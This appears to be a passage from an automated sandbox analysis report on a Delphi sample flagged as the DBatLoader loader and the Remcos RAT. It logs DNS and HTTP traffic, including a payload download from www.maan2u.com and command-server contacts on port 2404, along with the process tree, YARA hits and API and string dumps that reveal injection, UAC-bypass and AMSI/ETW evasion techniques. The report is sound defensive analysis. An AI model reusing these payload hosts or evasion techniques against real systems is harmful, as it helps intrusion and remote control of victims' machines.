Dec 19, 2024 08:03:33.774501085 CET | 2404 | 49725 | 185.174.103.111 | 192.168.2.7
Dec 19, 2024 08:03:33.783910036 CET | 49725 | 2404 | 192.168.2.7 | 185.174.103.111
Dec 19, 2024 08:03:33.903618097 CET | 2404 | 49725 | 185.174.103.111 | 192.168.2.7
Dec 19, 2024 08:04:04.086796999 CET | 2404 | 49725 | 185.174.103.111 | 192.168.2.7
Dec 19, 2024 08:04:04.088151932 CET | 49725 | 2404 | 192.168.2.7 | 185.174.103.111
Dec 19, 2024 08:04:04.207717896 CET | 2404 | 49725 | 185.174.103.111 | 192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2024 08:00:21.470062971 CET | 63210 | 53 | 192.168.2.7 | 1.1.1.1
Dec 19, 2024 08:00:22.326508045 CET | 53 | 63210 | 1.1.1.1 | 192.168.2.7
Dec 19, 2024 08:00:32.362943888 CET | 57675 | 53 | 192.168.2.7 | 1.1.1.1
Dec 19, 2024 08:00:32.518511057 CET | 53 | 57675 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 19, 2024 08:00:21.470062971 CET | 192.168.2.7 | 1.1.1.1 | 0xc9c4 | Standard query (0) | www.maan2u.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:00:32.362943888 CET | 192.168.2.7 | 1.1.1.1 | 0x8005 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 19, 2024 08:00:18.212495089 CET | 1.1.1.1 | 192.168.2.7 | 0x7731 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 08:00:18.212495089 CET | 1.1.1.1 | 192.168.2.7 | 0x7731 | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:00:22.326508045 CET | 1.1.1.1 | 192.168.2.7 | 0xc9c4 | No error (0) | www.maan2u.com | maan2u.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 08:00:22.326508045 CET | 1.1.1.1 | 192.168.2.7 | 0xc9c4 | No error (0) | maan2u.com | | 103.82.231.117 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:00:32.518511057 CET | 1.1.1.1 | 192.168.2.7 | 0x8005 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
• www.maan2u.com
• geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49736 | 178.237.33.50 | 80 | 7920 | C:\Windows\SysWOW64\colorcpl.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 19, 2024 08:00:32.643743992 CET71OUTGET /json.gp HTTP/1.1
                                                            Host: geoplugin.net
                                                            Cache-Control: no-cache
                                                            Dec 19, 2024 08:00:33.886032104 CET1171INHTTP/1.1 200 OK
                                                            date: Thu, 19 Dec 2024 07:00:33 GMT
                                                            server: Apache
                                                            content-length: 963
                                                            content-type: application/json; charset=utf-8
                                                            cache-control: public, max-age=300
                                                            access-control-allow-origin: *
                                                            Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            0 | 192.168.2.7 | 49710 | 103.82.231.117 | 443 | 7648 | C:\Users\user\Desktop\SEPTobn3BR.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-12-19 07:00:24 UTC | 168 | OUT | GET /docs/233_Emxwenemixg HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Accept: */*
                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                            Host: www.maan2u.com
                                                            2024-12-19 07:00:25 UTC | 365 | IN | HTTP/1.1 200 OK
                                                            Connection: close
                                                            last-modified: Tue, 17 Dec 2024 23:16:52 GMT
                                                            accept-ranges: bytes
                                                            content-length: 1129840
                                                            date: Thu, 19 Dec 2024 07:00:24 GMT
                                                            server: LiteSpeed
                                                            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"



                                                            Target ID:0
                                                            Start time:02:00:19
                                                            Start date:19/12/2024
                                                            Path:C:\Users\user\Desktop\SEPTobn3BR.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\SEPTobn3BR.exe"
                                                            Imagebase:0x400000
                                                            File size:1'362'944 bytes
                                                            MD5 hash:CCDCD04A0FFDE31366754018598EB02F
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:Borland Delphi
                                                            Yara matches:
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.1421740936.00000000022C6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.1334500441.000000007FB00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.1452056215.000000007FBD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1449264347.000000007E8E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1449264347.000000007E8E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:02:00:26
                                                            Start date:19/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                            Imagebase:0x410000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:02:00:26
                                                            Start date:19/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff75da10000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:02:00:27
                                                            Start date:19/12/2024
                                                            Path:C:\Windows\SysWOW64\colorcpl.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\System32\colorcpl.exe
                                                            Imagebase:0x970000
                                                            File size:86'528 bytes
                                                            MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.3812934475.00000000313BF000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.3812571420.00000000311A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.3812685840.00000000311F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000003.2755366865.00000000311F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.3812571420.00000000311CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                            Reputation:moderate
                                                            Has exited:false

                                                            Target ID:7
                                                            Start time:02:00:37
                                                            Start date:19/12/2024
                                                            Path:C:\Users\Public\Libraries\Emxwenem.PIF
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\Public\Libraries\Emxwenem.PIF"
                                                            Imagebase:0x400000
                                                            File size:1'362'944 bytes
                                                            MD5 hash:CCDCD04A0FFDE31366754018598EB02F
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:Borland Delphi
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 55%, ReversingLabs
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:8
                                                            Start time:02:00:38
                                                            Start date:19/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                            Imagebase:0x410000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:02:00:38
                                                            Start date:19/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff75da10000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:10
                                                            Start time:02:00:38
                                                            Start date:19/12/2024
                                                            Path:C:\Windows\SysWOW64\colorcpl.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\System32\colorcpl.exe
                                                            Imagebase:0x970000
                                                            File size:86'528 bytes
                                                            MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.1526792578.0000000000758000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.1526920917.0000000002990000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.1526920917.0000000002990000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000A.00000002.1526920917.0000000002990000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000000A.00000002.1526920917.0000000002990000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:11
                                                            Start time:02:00:45
                                                            Start date:19/12/2024
                                                            Path:C:\Users\Public\Libraries\Emxwenem.PIF
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\Public\Libraries\Emxwenem.PIF"
                                                            Imagebase:0x400000
                                                            File size:1'362'944 bytes
                                                            MD5 hash:CCDCD04A0FFDE31366754018598EB02F
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:Borland Delphi
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:12
                                                            Start time:02:00:46
                                                            Start date:19/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                            Imagebase:0x410000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:13
                                                            Start time:02:00:46
                                                            Start date:19/12/2024
                                                            Path:C:\Windows\SysWOW64\colorcpl.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\System32\colorcpl.exe
                                                            Imagebase:0x970000
                                                            File size:86'528 bytes
                                                            MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.1623286615.000000001ECB8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                            Has exited:true

                                                            Target ID:14
                                                            Start time:02:00:47
                                                            Start date:19/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff75da10000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true


                                                              Execution Graph

                                                              Execution Coverage:5.1%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:19.1%
                                                              Total number of Nodes:277
                                                              Total number of Limit Nodes:15
                                                              APIs
                                                              • InetIsOffline.URL(00000000,00000000,02BAAFA1,?,?,?,000002F7,00000000,00000000), ref: 02B9ECAE
                                                                • Part of subcall function 02B98824: LoadLibraryA.KERNEL32(00000000,00000000,02B9890B), ref: 02B98858
                                                                • Part of subcall function 02B98824: FreeLibrary.KERNEL32(74FC0000,00000000,02BE1388,Function_000065D8,00000004,02BE1398,02BE1388,05F5E0FF,00000040,02BE139C,74FC0000,00000000,00000000,00000000,00000000,02B9890B), ref: 02B988EB
                                                                • Part of subcall function 02B9EB94: GetModuleHandleW.KERNEL32(KernelBase,?,02B9EF98,UacInitialize,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanBuffer,02BE137C,02BAAFD8,ScanString,02BE137C,02BAAFD8,Initialize), ref: 02B9EB9A
                                                                • Part of subcall function 02B9EB94: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B9EBAC
                                                                • Part of subcall function 02B9EBF0: GetModuleHandleW.KERNEL32(KernelBase), ref: 02B9EC00
                                                                • Part of subcall function 02B9EBF0: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B9EC12
                                                                • Part of subcall function 02B9EBF0: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B9EC29
                                                                • Part of subcall function 02B87E18: GetFileAttributesA.KERNEL32(00000000,?,02B9F8CC,ScanString,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanString,02BE137C,02BAAFD8,UacScan,02BE137C,02BAAFD8,UacInitialize), ref: 02B87E23
                                                                • Part of subcall function 02B8C2EC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02CD58C8,?,02B9FBFE,ScanBuffer,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanBuffer,02BE137C,02BAAFD8,OpenSession), ref: 02B8C303
                                                                • Part of subcall function 02B9DBB0: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B9DC80), ref: 02B9DBEB
                                                                • Part of subcall function 02B9DBB0: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B9DC80), ref: 02B9DC1B
                                                                • Part of subcall function 02B9DBB0: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B9DC30
                                                                • Part of subcall function 02B9DBB0: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B9DC5C
                                                                • Part of subcall function 02B9DBB0: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B9DC65
                                                                • Part of subcall function 02B87E3C: GetFileAttributesA.KERNEL32(00000000,?,02BA2A49,ScanString,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanBuffer,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,Initialize), ref: 02B87E47
                                                                • Part of subcall function 02B87FD0: CreateDirectoryA.KERNEL32(00000000,00000000,?,02BA2BE7,OpenSession,02BE137C,02BAAFD8,ScanString,02BE137C,02BAAFD8,Initialize,02BE137C,02BAAFD8,ScanString,02BE137C,02BAAFD8), ref: 02B87FDD
                                                                • Part of subcall function 02B9DACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B9DB9E), ref: 02B9DB0B
                                                                • Part of subcall function 02B9DACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B9DB45
                                                                • Part of subcall function 02B9DACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B9DB72
                                                                • Part of subcall function 02B9DACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B9DB7B
                                                                • Part of subcall function 02B987A0: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02BE13A4,02B9A3C7,ScanString,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,Initialize,02BE13A4,02B9A77C,UacScan), ref: 02B987B4
                                                                • Part of subcall function 02B987A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B987CE
                                                                • Part of subcall function 02B987A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02BE13A4,02B9A3C7,ScanString,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,Initialize), ref: 02B9880A
                                                                • Part of subcall function 02B9870C: LoadLibraryW.KERNEL32(amsi), ref: 02B98715
                                                                • Part of subcall function 02B9870C: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B98774
                                                              • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanBuffer,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,02BAB330), ref: 02BA49B7
                                                                • Part of subcall function 02B9DA44: RtlInitUnicodeString.NTDLL(?,?), ref: 02B9DA6C
                                                                • Part of subcall function 02B9DA44: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B9DABE), ref: 02B9DA82
                                                                • Part of subcall function 02B9DA44: NtDeleteFile.NTDLL(?), ref: 02B9DAA1
                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 02BA4BB7
                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 02BA4C0D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$Library$AddressFreeLoadModuleProc$AttributesCloseCreateHandleMove$CheckDebuggerDeleteDirectoryInetInformationInitNameOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                                                              • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZER$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                                                              • API String ID: 3130226682-1898677207
                                                              • Opcode ID: 1aca352ba7916114f94992f6e217fc795b19021cdf83a67f387cccd150f077e1
                                                              • Instruction ID: 098ad59d5bc330fa4f5b6df91f75e883efe6ca7e42804aa58f6b28ca9d16d745
                                                              • Opcode Fuzzy Hash: 1aca352ba7916114f94992f6e217fc795b19021cdf83a67f387cccd150f077e1
                                                              • Instruction Fuzzy Hash: F4241875A5015A8FDB25FB64CC90ADE73B6BF89304F1044E6E10DEB254EA31AE86CF50

                                                              Control-flow Graph

                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B80000,02BAD790), ref: 02B85A94
                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B80000,02BAD790), ref: 02B85AB2
                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B80000,02BAD790), ref: 02B85AD0
                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B85AEE
                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B85B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B85B37
                                                              • RegQueryValueExA.ADVAPI32(?,02B85CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B85B7D,?,80000001), ref: 02B85B55
                                                              • RegCloseKey.ADVAPI32(?,02B85B84,00000000,?,?,00000000,02B85B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B85B77
                                                              • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B85B94
                                                              • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B85BA1
                                                              • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B85BA7
                                                              • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B85BD2
                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B85C19
                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B85C29
